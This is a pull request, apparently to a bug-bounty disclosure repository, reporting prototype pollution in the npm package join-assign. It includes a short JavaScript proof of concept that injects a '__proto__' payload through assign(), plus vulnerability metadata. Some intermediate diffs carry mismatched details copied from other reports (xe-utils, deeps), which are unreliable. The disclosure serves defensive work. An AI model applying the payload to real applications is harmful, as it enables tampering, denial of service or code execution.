### PR TITLE
Prototype Pollution in join-assign

### DIFF
--- a/bounties/npm/join-assign/1/README.md
+++ b/bounties/npm/join-assign/1/README.md
@@ -1,0 +1,30 @@
+# Description
+
+`join-assign` is vulnerable to `Prototype Pollution`.
+
+# Proof of Concept
+
+1. Create the following PoC file:
+```javascript
+// poc.js
+const { assign } = require('join-assign')
+
+console.log(`Before: ${{}.polluted}`)
+assign({}, JSON.parse('{"__proto__": {"polluted": true}}'))
+console.log(`After: ${{}.polluted}`)
+```
+2. Execute the following commands in the terminal:
+```bash
+npm i join-assign # install vulnerable package
+node poc.js # run the PoC
+```
+3. Check the output:
+```
+Before: undefined
+After: true
+```
+
+# Impact
+
+`Prototype Pollution` leads to Information Disclosure/DoS/RCE.
+

--- a/bounties/npm/join-assign/1/vulnerability.json
+++ b/bounties/npm/join-assign/1/vulnerability.json
@@ -44,7 +44,7 @@
             "JavaScript"
         ],
         "Owner": "diogoeichert",
-        "Name": "utils",
+        "Name": "join-assign",
         "Stars": "",
         "Forks": ""
     },

--- a/bounties/npm/join-assign/1/vulnerability.json
+++ b/bounties/npm/join-assign/1/vulnerability.json
@@ -4,7 +4,7 @@
     "AffectedVersionRange": "*",
     "Summary": "Prototype Pollution",
     "Contributor": {
-        "Discloser": "",
+        "Discloser": "arjunshibu",
         "Fixer": ""
     },
     "Package": {
@@ -39,7 +39,7 @@
         ""
     ],
     "Repository": {
-        "URL": "https://github.com/diogoeichert/utils/tree/main/join-assign",
+        "URL": "https://github.com/diogoeichert/join-assign",
         "Codebase": [
             "JavaScript"
         ],

--- a/bounties/npm/join-assign/1/vulnerability.json
+++ b/bounties/npm/join-assign/1/vulnerability.json
@@ -1,17 +1,17 @@
 {
     "PackageVulnerabilityID": "1",
-    "DisclosureDate": "2020-12-27",
-    "AffectedVersionRange": "<=1.4.5",
+    "DisclosureDate": "2021-01-18",
+    "AffectedVersionRange": "*",
     "Summary": "Prototype Pollution",
     "Contributor": {
-        "Discloser": "arjunshibu",
+        "Discloser": "",
         "Fixer": ""
     },
     "Package": {
         "Registry": "npm",
-        "Name": "xe-utils",
-        "URL": "https://www.npmjs.com/package/deeps",
-        "Downloads": "86"
+        "Name": "join-assign",
+        "URL": "https://www.npmjs.com/package/join-assign",
+        "Downloads": "8"
     },
     "CWEs": [
         {
@@ -19,7 +19,8 @@
             "Description": "Modification of Assumed-Immutable Data (MAID)"
         }
     ],
-    "CVSS": {
+    "CVSS":
+    {
         "Version": "3.1",
         "AV": "N",
         "AC": "L",
@@ -38,22 +39,15 @@
         ""
     ],
     "Repository": {
-        "URL": "https://github.com/Salakar/deeps",
+        "URL": "https://github.com/diogoeichert/utils/tree/main/join-assign",
         "Codebase": [
             "JavaScript"
         ],
-        "Owner": "Salakar",
-        "Name": "deeps",
-        "Forks": "8",
-        "Stars": "22"
+        "Owner": "diogoeichert",
+        "Name": "utils"
     },
     "Permalinks": [
         ""
     ],
-    "References": [
-        {
-            "Description": "",
-            "URL": ""
-        }
-    ]
+    "References": []
 }

--- a/bounties/npm/join-assign/1/vulnerability.json
+++ b/bounties/npm/join-assign/1/vulnerability.json
@@ -47,7 +47,7 @@
         "Name": "utils"
     },
     "Permalinks": [
-        ""
+        "https://github.com/diogoeichert/utils/blob/main/join-assign/index.js#L10"
     ],
     "References": []
 }

--- a/bounties/npm/join-assign/1/vulnerability.json
+++ b/bounties/npm/join-assign/1/vulnerability.json
@@ -1,0 +1,59 @@
+{
+    "PackageVulnerabilityID": "1",
+    "DisclosureDate": "2020-12-27",
+    "AffectedVersionRange": "<=1.4.5",
+    "Summary": "Prototype Pollution",
+    "Contributor": {
+        "Discloser": "arjunshibu",
+        "Fixer": ""
+    },
+    "Package": {
+        "Registry": "npm",
+        "Name": "xe-utils",
+        "URL": "https://www.npmjs.com/package/deeps",
+        "Downloads": "86"
+    },
+    "CWEs": [
+        {
+            "ID": "471",
+            "Description": "Modification of Assumed-Immutable Data (MAID)"
+        }
+    ],
+    "CVSS": {
+        "Version": "3.1",
+        "AV": "N",
+        "AC": "L",
+        "PR": "N",
+        "UI": "N",
+        "S": "U",
+        "C": "L",
+        "I": "L",
+        "A": "L",
+        "E": "",
+        "RL": "",
+        "RC": "",
+        "Score": "5.6"
+    },
+    "CVEs": [
+        ""
+    ],
+    "Repository": {
+        "URL": "https://github.com/Salakar/deeps",
+        "Codebase": [
+            "JavaScript"
+        ],
+        "Owner": "Salakar",
+        "Name": "deeps",
+        "Forks": "8",
+        "Stars": "22"
+    },
+    "Permalinks": [
+        ""
+    ],
+    "References": [
+        {
+            "Description": "",
+            "URL": ""
+        }
+    ]
+}

--- a/bounties/npm/join-assign/1/vulnerability.json
+++ b/bounties/npm/join-assign/1/vulnerability.json
@@ -44,8 +44,11 @@
             "JavaScript"
         ],
         "Owner": "diogoeichert",
-        "Name": "utils"
+        "Name": "utils",
+        "Stars": "",
+        "Forks": "",
     },
+    "PrNumber": "",
     "Permalinks": [
         "https://github.com/diogoeichert/utils/blob/main/join-assign/index.js#L10"
     ],

--- a/bounties/npm/join-assign/1/vulnerability.json
+++ b/bounties/npm/join-assign/1/vulnerability.json
@@ -46,11 +46,11 @@
         "Owner": "diogoeichert",
         "Name": "utils",
         "Stars": "",
-        "Forks": "",
+        "Forks": ""
     },
-    "PrNumber": "",
     "Permalinks": [
         "https://github.com/diogoeichert/utils/blob/main/join-assign/index.js#L10"
     ],
-    "References": []
+    "References": [],
+    "PrNumber": ""
 }


### PR DESCRIPTION
# Description

`join-assign` is vulnerable to `Prototype Pollution`.

# Proof of Concept

1. Create the following PoC file:
```javascript
// poc.js
const { assign } = require('join-assign')

console.log(`Before: ${{}.polluted}`)
assign({}, JSON.parse('{"__proto__": {"polluted": true}}'))
console.log(`After: ${{}.polluted}`)
```
2. Execute the following commands in the terminal:
```bash
npm i join-assign # install vulnerable package
node poc.js # run the PoC
```
3. Check the output:
```
Before: undefined
After: true
```

# Impact

`Prototype Pollution` leads to Information Disclosure/DoS/RCE.

## :white_check_mark: Checklist

* [x]  _Created and populated the `README.md` and `vulnerability.json` files_

* [x]  _Provided the repository URL and any applicable permalinks_

* [x]  _Defined all the applicable weaknesses (CWEs)_

* [x]  _Proposed the CVSS vector items i.e. User Interaction, Attack Complexity_

* [x]  _Checked that the vulnerability affects the latest version of the package released_

* [x]  _Checked that a fix does not currently exist that remediates this vulnerability_

* [x]  _Complied with all applicable laws_